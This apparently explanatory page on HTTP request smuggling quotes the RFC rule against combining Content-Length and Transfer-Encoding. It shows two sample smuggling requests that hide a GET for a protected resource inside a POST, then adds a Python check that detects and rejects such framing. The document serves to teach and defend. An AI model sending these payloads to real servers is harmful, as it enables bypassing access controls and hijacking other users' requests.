on 13-Apr-2023 05:00

POST /login.php HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

user=test&password=password123

POST /login.php HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

1E
user=test&password=password123
0

A sender MUST NOT send a Content-Length header field in any message
that contains a Transfer-Encoding header field.

If a message is received with both a Transfer-Encoding and a
Content-Length header field, the Transfer-Encoding overrides the
Content-Length. Such a message might indicate an attempt to
perform request smuggling (Section 9.5) or response splitting
(Section 9.4) and ought to be handled as an error. A sender MUST
remove the received Content-Length field prior to forwarding such
a message downstream.

POST /login.php HTTP/1.1
Host: vulnerable.example.com
Content-Length: 41
Transfer-Encoding: chunked

0

GET /protectedresource.html HTTP/1.1

POST /login.php HTTP/1.1
Host: vulnerable.example.com
Content-Length: 4
Transfer-Encoding: chunked

24
GET /protectedresource.html HTTP/1.0
0
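
Added example (not from the original page): a Python check that applies the RFC rule quoted above, treating any request that carries both Content-Length and Transfer-Encoding as an error, and reports the bytes each framing interpretation would leave unread for the two sample requests. The function and variable names are illustrative, the sample bytes are rebuilt from the requests above with CRLF line endings, and the chunk parser assumes well-formed chunks with no trailer fields.

```python
# Added example: detect ambiguous HTTP/1.1 framing (Content-Length together with
# Transfer-Encoding) and show where two parsers would disagree about the body.

def split_head(raw: bytes):
    """Return ([(name, value), ...] lower-cased, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = []
    for line in head.split(b"\r\n")[1:]:            # skip the request line
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower(), value.strip().lower()))
    return headers, body

def leftover_by_content_length(headers, body: bytes) -> bytes:
    """Bytes remaining after a parser that honours Content-Length reads the body."""
    return body[int(dict(headers)[b"content-length"]):]

def leftover_by_chunked(body: bytes) -> bytes:
    """Bytes remaining after a parser that honours chunked encoding reads the body.
    Assumes well-formed chunks and no trailer fields."""
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)   # drop chunk extensions
        pos = eol + 2
        if size == 0:
            return body[pos + 2:]                   # skip the final CRLF
        pos += size + 2                             # chunk data plus its CRLF

def check_framing(raw: bytes) -> dict:
    headers, body = split_head(raw)
    names = {n for n, _ in headers}
    if not {b"content-length", b"transfer-encoding"} <= names:
        return {"reject": False}
    # Both headers present: per the quoted RFC text this is handled as an error.
    return {"reject": True,
            "cl_leftover": leftover_by_content_length(headers, body),
            "te_leftover": leftover_by_chunked(body)}

# Constructed inputs: the page's sample requests with CRLF line endings.
HEAD = b"POST /login.php HTTP/1.1\r\nHost: vulnerable.example.com\r\n"
SAMPLE_CL41 = (HEAD + b"Content-Length: 41\r\nTransfer-Encoding: chunked\r\n\r\n"
               b"0\r\n\r\nGET /protectedresource.html HTTP/1.1")
SAMPLE_CL4 = (HEAD + b"Content-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n"
              b"24\r\nGET /protectedresource.html HTTP/1.0\r\n0\r\n\r\n")
SAMPLE_PLAIN = (b"POST /login.php HTTP/1.1\r\nHost: www.example.com\r\n"
                b"Content-Length: 30\r\n\r\nuser=test&password=password123")

if __name__ == "__main__":
    for label, req in (("CL=41", SAMPLE_CL41), ("CL=4", SAMPLE_CL4), ("plain", SAMPLE_PLAIN)):
        print(label, check_framing(req))
```

A non-empty leftover under either interpretation is the part of the message that one hop would treat as body and the other as the start of a new request, which is why the check rejects on header presence alone rather than trying to pick a winner.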